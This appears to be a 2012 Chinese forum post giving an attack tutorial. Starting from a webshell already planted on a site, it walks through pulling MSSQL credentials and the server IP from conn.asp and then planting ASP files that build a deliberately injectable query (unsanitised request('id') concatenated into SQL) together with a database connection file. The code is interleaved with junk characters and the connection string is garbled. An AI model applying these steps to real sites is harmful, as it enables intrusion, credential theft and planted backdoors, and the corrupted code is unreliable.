首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:. \4 w5 a$ l. ]/ G4 u" B ?
ASP/Visual Basic代码7 P+ i6 e* U7 B7 `) ?0 J" |
<!--#include file="xx.asp"--> " J- w, V. J; D' b- q
<%
+ v ]& X( O. D! n3 \; x6 @4 fset rs=server.createobject("ADODB.recordset")
% N- Q k: X2 F8 J- t7 y; P, D' Z/ kid = request("id") - d' F' e) d; }' i$ ?, H
strSQL = "select * from admin where id=" & id % `- T- K7 Z4 a7 ?" _; o
rs.open strSQL,conn,1,3
) l0 S* P' y0 irs.close
6 z9 N5 ^! `# L' X; m0 @ g%> , L( `9 s4 z4 _5 d2 J G
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
; G$ b" k0 m' w: e: a8 p2 n然后就要构造一个连接数据库的文件了,代码如下:5 r% T9 n5 K8 y5 t
ASP/Visual Basic代码. u0 ?0 H3 G7 R; |. W2 S% c+ [# Y
<%
( s, Z* L$ R! p5 i+ E/ M% Z3 Q0 astrSQLServerName = "000.000.000.000" '服务器名称或地址
+ n( L, K) T" r2 [strSQLDBUserName = "sqlname" '数据库帐号 - I% n0 G5 Y9 C9 P0 \
strSQLDBPassword = "sqlpass" '数据库密码 " I; z2 A' e- F4 C
strSQLDBName = "sqldataname" '数据库名称 ) W$ Z& N+ I9 }. V* `
Set conn = Server.CreateObject("ADODB.Connection") # v( W! Y6 K4 o: I9 L
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
! I5 O- Y- n* H! ]conn.open strCon - y% d$ V$ \( a: X( K
%>
6 s- Q' O8 Y& K- {3 s! C1 p! R这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功
}8 D8 x. @( X |
发表于 2012-9-13 17:53:08
收藏
支持
反对